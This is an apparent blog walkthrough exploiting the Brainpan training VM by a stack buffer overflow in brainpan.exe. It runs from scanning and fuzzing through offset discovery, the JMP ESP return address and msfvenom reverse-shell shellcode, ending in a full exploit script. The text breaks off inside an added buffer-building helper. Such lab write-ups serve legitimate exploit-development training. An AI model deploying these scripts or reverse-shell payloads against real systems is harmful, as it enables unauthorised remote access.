Hi Techmates! Brainpan is a vulnerable virtual machine designed for people who are preparing for the OSCP or who want to practise exploiting a stack-based buffer overflow. This blog will take you through exploiting Brainpan step by step.
Direct links to download the virtual machine - http://download.vulnhub.com/brainpan/Brainpan.zip
Setting up the Virtual Machine:
- Download the ZIP file “brainpan.zip”.
- Extract the file in a folder.
- Import the "brainpan.ova" file into VirtualBox or VMware.
- The network adapter is set to Bridged by default. You can change it according to your requirements; if you are not sure, leave the default setting.
- Start the virtual machine in VirtualBox/VMware.
Attacker's IP - 192.168.43.204
Victim's IP (Brainpan) - 192.168.43.205 (discovered in Step 1 below)
Exploiting Brainpan:
Step 1: Discovering the IP Address
- Discover the active hosts on the network using either of the following:
- Nmap - nmap 192.168.43.1/24 (this also port-scans every host it finds; nmap -sn 192.168.43.1/24 does host discovery only)
- Netdiscover - netdiscover
- The Brainpan VM is running on 192.168.43.205
Step 2: Scanning
- Nmap - nmap -sC -sV -vv -Pn -p 1-65535 192.168.43.205
#nmap -Pn -sC -sV -vv -A 192.168.43.205 -p 1-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-26 08:22 IST
Warning: File ./nmap.xsl exists, but Nmap is using /usr/bin/../share/nmap/nmap.xsl for security and consistency reasons. set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:22
Completed Parallel DNS resolution of 1 host. at 08:22, 4.09s elapsed
Initiating Connect Scan at 08:22
Scanning 192.168.43.205 [65535 ports]
Discovered open port 9999/tcp on 192.168.43.205
Discovered open port 10000/tcp on 192.168.43.205
Completed Connect Scan at 08:22, 0.88s elapsed (65535 total ports)
Initiating Service scan at 08:22
Scanning 2 services on 192.168.43.205
Completed Service scan at 08:22, 6.11s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.43.205.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:22
NSE Timing: About 99.64% done; ETC: 08:23 (0:00:00 remaining)
Completed NSE at 08:23, 31.09s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:23
Completed NSE at 08:23, 0.04s elapsed
Nmap scan report for 192.168.43.205
Host is up, received user-set (0.00016s latency).
Scanned at 2018-10-26 08:22:27 IST for 38s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT      STATE SERVICE REASON  VERSION
9999/tcp  open  abyss?  syn-ack
| fingerprint-strings:
|   NULL:
|     _|                            _|
|     _|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|
|     _|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
|     _|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
|     _|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
|                                                 _|
|                                                 _|
|
|     [________________________ WELCOME TO BRAINPAN _________________________]
|_                              ENTER THE PASSWORD
10000/tcp open  http    syn-ack SimpleHTTPServer 0.6 (Python 2.7.3)
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.70%I=7%D=10/26%Time=5BD28172%P=x86_64-pc-linux-gnu%r(N
SF:ULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\
SF:|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20
SF:\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\
SF:x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\
SF:x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\
SF:x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\
SF:|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\
SF:x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\
SF:x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\
SF:x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\
SF:x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\
SF:x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\
SF:x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:23
Completed NSE at 08:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:23
Completed NSE at 08:23, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.27 seconds
We have two TCP ports open: 9999, which nmap labels "abyss?" only because of the port number (the service itself is unrecognised; its banner is a custom "ENTER THE PASSWORD" prompt), and 10000, a Python 2.7.3 SimpleHTTPServer.
- Nikto - nikto -h 192.168.43.205 -p 10000
# sudo nikto -h 192.168.43.205 -p 10000
- Nikto v2.1.6
+ Target IP:          192.168.43.205
+ Target Hostname:    192.168.43.205
+ Target Port:        10000
+ Start Time:         2018-10-26 08:26:22 (GMT5.5)
+ Server: SimpleHTTP/0.6 Python/2.7.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)
+ Python/2.7.3 appears to be outdated (current is at least 2.7.5)
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 7 item(s) reported on remote host
+ End Time:           2018-10-26 08:26:30 (GMT5.5) (8 seconds)
+ 1 host(s) tested
Step 3: Browse to http://192.168.43.205:10000/. Viewing the source of the page does not reveal much information either.
Exhibit 1
Step 4: Run a directory brute-force with dirb (the command-line tool, not DirBuster) - dirb http://192.168.43.205:10000/
#dirb http://192.168.43.205:10000/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Nov 1 18:23:17 2018
URL_BASE: http://192.168.43.205:10000/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.43.205:10000/ ----
+ http://192.168.43.205:10000/bin (CODE:301|SIZE:0)
+ http://192.168.43.205:10000/index.html (CODE:200|SIZE:215)
-----------------
END_TIME: Thu Nov 1 18:23:24 2018
DOWNLOADED: 4612 - FOUND: 2
Step 5: Here is what’s seen when connecting to 192.168.43.205:9999 using netcat:
- nc 192.168.43.205 9999
Exhibit 2
Step 6: Enter any password; the service replies that access is denied.
Step 7: Browse to http://192.168.43.205:10000/bin/. We can see a "brainpan.exe" file, which is a Windows executable.
Exhibit 3
Step 8: Let us check this file using the "file" command.
Exhibit 4
Step 9: Let us check the file using the "strings" command - strings brainpan.exe. Let us take a look at the functions the executable imports.
Exhibit 5
Since the application imports socket, bind, listen, accept, recv and send, we can tell that it is a network server. It also uses strcmp, strlen, printf and strcpy. strcpy is the one to note: it copies until it reaches a NUL byte and performs no bounds check, so if the received password is copied into a fixed-size stack buffer, an over-long input overwrites whatever lies beyond that buffer, including the saved return address. The NUL-terminated copy also means our input must not contain \x00, which is why that byte is excluded when generating shellcode later.
Step 10: Install Immunity Debugger on a Windows test machine (192.168.43.88 in this walkthrough) and copy the executable to it. Click File → Open → brainpan.exe, then press F9 or click Run so the service starts listening on port 9999 under the debugger.
Exhibit 6
Step 11: We can see the service listening on port 9999 and the strcpy call that is vulnerable to a buffer overflow. Let us write a simple attacker's script to see if we can crash the application. The following Python script connects to the service and sends 1000 "A"s:
import sys, socket

host = "192.168.43.88"   # IP address of the Windows machine running brainpan.exe under Immunity
port = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host, port))
    s.recv(1024)            # read the banner and password prompt
    junk = b"A" * 1000      # oversized input for the strcpy'd buffer
    s.sendall(junk)
    print("Sent")
except socket.error:
    print("Unable to connect " + str(host))
    sys.exit(1)
finally:
    s.close()
Step 12: Save the file as exploit_brainpan.py and run it from Kali Linux - python exploit_brainpan.py. (The script targets the Windows test machine, 192.168.43.88, where brainpan.exe is running under Immunity Debugger.)
Exhibit 7
Step 13: As soon as the payload is sent you will notice in Immunity Debugger that EIP has been overwritten with 41414141, i.e. "AAAA".
Exhibit 8
Step 14: Thus, EIP has been successfully overwritten with A's (0x41). The next step is to determine after how many bytes EIP is overwritten. We will use pattern_create and pattern_offset from the Metasploit Framework. To create a pattern, go to /usr/share/metasploit-framework/tools/exploit/ and type the given command:
#./pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B |
Step 15: We take this pattern and replace the 1000 "A"s in our exploit with the entire pattern, so the exploit now looks like:
import sys, socket

host = "192.168.43.88"   # Windows test machine running brainpan.exe under Immunity
port = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print("Connecting to " + str(host))
    s.connect((host, port))
    s.recv(1024)            # read the banner and password prompt
    # 1000-byte non-repeating pattern from pattern_create.rb -l 1000
    junk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
    print("Sending Payload...")
    s.sendall(junk)
    print("Sent")
except socket.error:
    print("Unable to connect " + str(host))
    sys.exit(1)
finally:
    s.close()
Step 16: Execute the script. This time EIP is overwritten with 35724134. Because x86 is little-endian, those register bytes (0x34 0x41 0x72 0x35 in memory order) correspond to the ASCII sequence "4Ar5" in the pattern.
Exhibit 9
Step 17: Let us look that value up with pattern_offset from the Metasploit Framework: ./pattern_offset.rb -q 35724134. It reports an exact match at offset 524, so the first 524 bytes of input fill the buffer and saved registers, and the next 4 bytes land in EIP.
Exhibit 10
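Added example (not part of the original post): a Python re-implementation of the cyclic-pattern scheme that Metasploit's pattern_create.rb and pattern_offset.rb use in Steps 14 to 17, so the pattern can be generated and the offset recovered without the framework installed. It assumes the EIP value 0x35724134 observed above; the pattern it produces is the same one shown in Step 14.

```python
#!/usr/bin/env python3
"""Cyclic-pattern helpers (added example, not the post's own code).

Re-implements the scheme used by Metasploit's pattern_create.rb and
pattern_offset.rb. Assumes the EIP value 0x35724134 seen in Immunity
(Step 16) and the 1000-byte pattern length used on the page.
"""
import itertools
import string
import struct


def pattern_create(length):
    """Return a non-repeating pattern of `length` bytes.

    Triplets are formed from (uppercase, lowercase, digit) with the digit
    cycling fastest: Aa0 Aa1 ... Aa9 Ab0 ... Az9 Ba0 ..., exactly the order
    pattern_create.rb uses, so offsets match the Metasploit tool.
    """
    triplets = itertools.product(string.ascii_uppercase,
                                 string.ascii_lowercase,
                                 string.digits)
    out = bytearray()
    for upper, lower, digit in triplets:
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(value, length=1000):
    """Return the byte offset of `value` inside the pattern, or None.

    `value` may be the integer read from the EIP register (0x35724134); it
    is then converted to the little-endian byte order in which the CPU
    loaded it from the stack (b"4Ar5"). A bytes object is searched as-is.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value)
    else:
        needle = value
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


if __name__ == "__main__":
    pat = pattern_create(1000)
    print(pat.decode())
    print("offset of EIP 0x35724134:", pattern_offset(0x35724134))
```

pattern_offset(0x35724134) returns 524, the value the exploit uses for its filler from Step 18 onward; a value that never occurs in the pattern (such as 0x41414141 from the all-"A" crash) returns None, which is the signal that the crash did not come from the pattern you sent.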
Step 18: The updated attacker's script, with 524 bytes of filler, four "B"s where EIP should land and 500 "C"s after it, looks like:
import sys, socket

host = "192.168.43.88"   # Windows test machine running brainpan.exe under Immunity
port = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print("Connecting to " + str(host))
    s.connect((host, port))
    s.recv(1024)            # read the banner and password prompt
    junk = b"A" * 524       # filler up to the saved return address (pattern_offset)
    EIP = b"BBBB"           # should appear in EIP as 42424242
    payload = b"C" * 500    # data that follows the return address on the stack
    print("Sending Payload...")
    s.sendall(junk + EIP + payload)
    print("Sent")
except socket.error:
    print("Unable to connect " + str(host))
    sys.exit(1)
finally:
    s.close()
Step 19: Execute the script. You will notice that EIP gets overwritten with 42424242, i.e. "BBBB", which confirms that the offset of 524 is exact.
Exhibit 11
Step 20: Now we need to overwrite EIP with the address of a JMP ESP instruction, so that execution jumps to the data we place right after the return address. Any equivalent instruction will do: jmp esp, call esp, or push esp; ret.
Go to View → Executable Modules and select brainpan.exe itself (it is the main executable, not a DLL): it has SafeSEH and ASLR set to False, so its addresses are stable across runs. The address of a jmp esp inside that module is what we put in EIP to redirect the flow to our shellcode. Check that the chosen address contains no bad characters (in particular no \x00 byte), because strcpy would stop copying at that point.
Exhibit 12
Step 21: Right click and click on Search→ Command.
Exhibit 13
Step 22: Enter the command JMP ESP and click on Find. You will notice a JMP ESP at address 0x311712F3.
Exhibit 14
Step 23: Replace the "BBBB" in EIP with the address of the JMP ESP.
Note: x86 is little-endian, so the address is written byte-reversed when it is placed on the stack, i.e. 0x311712F3 becomes \xf3\x12\x17\x31.
Step 24: Let us send the following exploit to the application.
import sys, socket

host = "192.168.43.88"   # Windows test machine running brainpan.exe under Immunity
port = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print("Connecting to " + str(host))
    s.connect((host, port))
    s.recv(1024)                      # read the banner and password prompt
    junk = b"A" * 524                 # filler up to the saved return address
    EIP = b'\xf3\x12\x17\x31'         # 0x311712F3 = JMP ESP in brainpan.exe, little-endian
    payload = b"C" * 10 + b"D" * 10   # markers to see where ESP points after the jump
    print("Sending Payload...")
    s.sendall(junk + EIP + payload)
    print("Sent")
except socket.error:
    print("Unable to connect " + str(host))
    sys.exit(1)
finally:
    s.close()
Step 25: Send the payload. After the JMP ESP you will notice that ESP points at the 10 D's rather than at the C's that immediately follow the return address. Rather than depend on exactly where ESP lands, we replace the 10 C's with \x90 (NOP) bytes: a NOP sled slides execution forward into the shellcode wherever inside it the jump lands.
Exhibit 15
Step 26: The next step is creating a payload. To create reverse TCP shellcode, open a terminal and type the following command. The -b '\x00' option excludes the NUL byte, which strcpy would treat as the end of the string, so the encoder produces output without it. This Windows payload is for the test run against the Windows machine under Immunity; the Linux target gets its own payload in Step 30.
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.43.204 LPORT=1234 R -e x86/shikata_ga_nai -b '\x00' -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
"\xdb\xc2\xbb\xd5\x90\x9d\x1c\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x52\x31\x58\x17\x83\xe8\xfc\x03\x8d\x83\x7f\xe9\xd1\x4c\xfd"
"\x12\x29\x8d\x62\x9a\xcc\xbc\xa2\xf8\x85\xef\x12\x8a\xcb\x03"
"\xd8\xde\xff\x90\xac\xf6\xf0\x11\x1a\x21\x3f\xa1\x37\x11\x5e"
"\x21\x4a\x46\x80\x18\x85\x9b\xc1\x5d\xf8\x56\x93\x36\x76\xc4"
"\x03\x32\xc2\xd5\xa8\x08\xc2\x5d\x4d\xd8\xe5\x4c\xc0\x52\xbc"
"\x4e\xe3\xb7\xb4\xc6\xfb\xd4\xf1\x91\x70\x2e\x8d\x23\x50\x7e"
"\x6e\x8f\x9d\x4e\x9d\xd1\xda\x69\x7e\xa4\x12\x8a\x03\xbf\xe1"
"\xf0\xdf\x4a\xf1\x53\xab\xed\xdd\x62\x78\x6b\x96\x69\x35\xff"
"\xf0\x6d\xc8\x2c\x8b\x8a\x41\xd3\x5b\x1b\x11\xf0\x7f\x47\xc1"
"\x99\x26\x2d\xa4\xa6\x38\x8e\x19\x03\x33\x23\x4d\x3e\x1e\x2c"
"\xa2\x73\xa0\xac\xac\x04\xd3\x9e\x73\xbf\x7b\x93\xfc\x19\x7c"
"\xd4\xd6\xde\x12\x2b\xd9\x1e\x3b\xe8\x8d\x4e\x53\xd9\xad\x04"
"\xa3\xe6\x7b\x8a\xf3\x48\xd4\x6b\xa3\x28\x84\x03\xa9\xa6\xfb"
"\x34\xd2\x6c\x94\xdf\x29\xe7\x5b\xb7\x1a\x3b\x33\xca\x5c\xc7"
"\x16\x43\xba\xad\x86\x02\x15\x5a\x3e\x0f\xed\xfb\xbf\x85\x88"
"\x3c\x4b\x2a\x6d\xf2\xbc\x47\x7d\x63\x4d\x12\xdf\x22\x52\x88"
"\x77\xa8\xc1\x57\x87\xa7\xf9\xcf\xd0\xe0\xcc\x19\xb4\x1c\x76"
"\xb0\xaa\xdc\xee\xfb\x6e\x3b\xd3\x02\x6f\xce\x6f\x21\x7f\x16"
"\x6f\x6d\x2b\xc6\x26\x3b\x85\xa0\x90\x8d\x7f\x7b\x4e\x44\x17"
"\xfa\xbc\x57\x61\x03\xe9\x21\x8d\xb2\x44\x74\xb2\x7b\x01\x70"
"\xcb\x61\xb1\x7f\x06\x22\xc1\x35\x0a\x03\x4a\x90\xdf\x11\x17"
"\x23\x0a\x55\x2e\xa0\xbe\x26\xd5\xb8\xcb\x23\x91\x7e\x20\x5e"
Step 27: Now the final exploit looks like:
import sys, socket

host = "169.254.255.83"   # Windows test machine in this run (elsewhere in this post it is 192.168.43.88)
port = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print("Connecting to " + str(host))
    s.connect((host, port))
    s.recv(1024)                        # read the banner and password prompt
    junk = b"A" * 524                   # filler up to the saved return address
    EIP = b'\xf3\x12\x17\x31'           # 0x311712F3 = JMP ESP in brainpan.exe, little-endian
    nops = b'\x90' * 11                 # NOP sled so the jump lands cleanly in the shellcode
    # Generated with: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.6 LPORT=1234 R -e x86/shikata_ga_nai -b '\x00' -f c
    # NOTE: this shellcode connects back to 192.168.1.6; regenerate it with your own LHOST (Step 26) before use.
    payload = b'\xbd\x39\x83\xf4\x35\xd9\xc0\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x52\x31\x6a\x12\x03\x6a\x12\x83\xd3\x7f\x16\xc0\xdf\x68\x55\x2b\x1f\x69\x3a\xa5\xfa\x58\x7a\xd1\x8f\xcb\x4a\x91\xdd\xe7\x21\xf7\xf5\x7c\x47\xd0\xfa\x35\xe2\x06\x35\xc5\x5f\x7a\x54\x45\xa2\xaf\xb6\x74\x6d\xa2\xb7\xb1\x90\x4f\xe5\x6a\xde\xe2\x19\x1e\xaa\x3e\x92\x6c\x3a\x47\x47\x24\x3d\x66\xd6\x3e\x64\xa8\xd9\x93\x1c\xe1\xc1\xf0\x19\xbb\x7a\xc2\xd6\x3a\xaa\x1a\x16\x90\x93\x92\xe5\xe8\xd4\x15\x16\x9f\x2c\x66\xab\x98\xeb\x14\x77\x2c\xef\xbf\xfc\x96\xcb\x3e\xd0\x41\x98\x4d\x9d\x06\xc6\x51\x20\xca\x7d\x6d\xa9\xed\x51\xe7\xe9\xc9\x75\xa3\xaa\x70\x2c\x09\x1c\x8c\x2e\xf2\xc1\x28\x25\x1f\x15\x41\x64\x48\xda\x68\x96\x88\x74\xfa\xe5\xba\xdb\x50\x61\xf7\x94\x7e\x76\xf8\x8e\xc7\xe8\x07\x31\x38\x21\xcc\x65\x68\x59\xe5\x05\xe3\x99\x0a\xd0\xa4\xc9\xa4\x8b\x04\xb9\x04\x7c\xed\xd3\x8a\xa3\x0d\xdc\x40\xcc\xa4\x27\x03\x33\x90\x26\xd5\xdb\xe3\x28\xdd\xc9\x6d\xce\xb7\xfd\x3b\x59\x20\x67\x66\x11\xd1\x68\xbc\x5c\xd1\xe3\x33\xa1\x9c\x03\x39\xb1\x49\xe4\x74\xeb\xdc\xfb\xa2\x83\x83\x6e\x29\x53\xcd\x92\xe6\x04\x9a\x65\xff\xc0\x36\xdf\xa9\xf6\xca\xb9\x92\xb2\x10\x7a\x1c\x3b\xd4\xc6\x3a\x2b\x20\xc6\x06\x1f\xfc\x91\xd0\xc9\xba\x4b\x93\xa3\x14\x27\x7d\x23\xe0\x0b\xbe\x35\xed\x41\x48\xd9\x5c\x3c\x0d\xe6\x51\xa8\x99\x9f\x8f\x48\x65\x4a\x14\x78\x2c\xd6\x3d\x11\xe9\x83\x7f\x7c\x0a\x7e\x43\x79\x89\x8a\x3c\x7e\x91\xff\x39\x3a\x15\xec\x33\x53\xf0\x12\xe7\x54\xd1'
    print("Sending Payload...")
    s.sendall(junk + EIP + nops + payload)
    print("Sent")
except socket.error:
    print("Unable to connect " + str(host))
    sys.exit(1)
finally:
    s.close()
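Added example (not the post's own code, nor Metasploit's): helpers that assemble the buffer used in Steps 23 to 27 and again in Step 30, packing the JMP ESP address little-endian, rejecting any bad character before the bytes go on the wire, and laying out junk | EIP | NOP sled | shellcode. The offset 524 and address 0x311712F3 are the page's values; the msfvenom-style C dump embedded below is a constructed sample of breakpoint bytes, not real shellcode, so a real payload from Step 26 or Step 30 has to be substituted before use.

```python
#!/usr/bin/env python3
"""Exploit-buffer assembly helpers (added example, not the post's code).

Offset (524) and return address (0x311712F3) are the values found on the
page. SAMPLE_C_OUTPUT is a constructed stand-in for msfvenom's `-f c`
dump; it is breakpoint bytes, not a working payload.
"""
import re
import struct

OFFSET = 524            # bytes before the saved return address (Step 17)
JMP_ESP = 0x311712F3    # JMP ESP inside brainpan.exe (Step 22)
BADCHARS = b"\x00"      # strcpy stops at the first NUL byte


def parse_c_buf(text):
    """Turn an msfvenom `-f c` dump (unsigned char buf[] = "...") into bytes.

    Only the \\xHH escapes are read, so the surrounding C syntax, line
    breaks and trailing semicolon are irrelevant and nothing is retyped.
    """
    escapes = re.findall(r"\\x([0-9a-fA-F]{2})", text)
    return bytes(int(h, 16) for h in escapes)


def find_badchars(data, badchars=BADCHARS):
    """Return the sorted list of forbidden byte values present in `data`."""
    return sorted(set(data) & set(badchars))


def build_buffer(shellcode, offset=OFFSET, ret=JMP_ESP,
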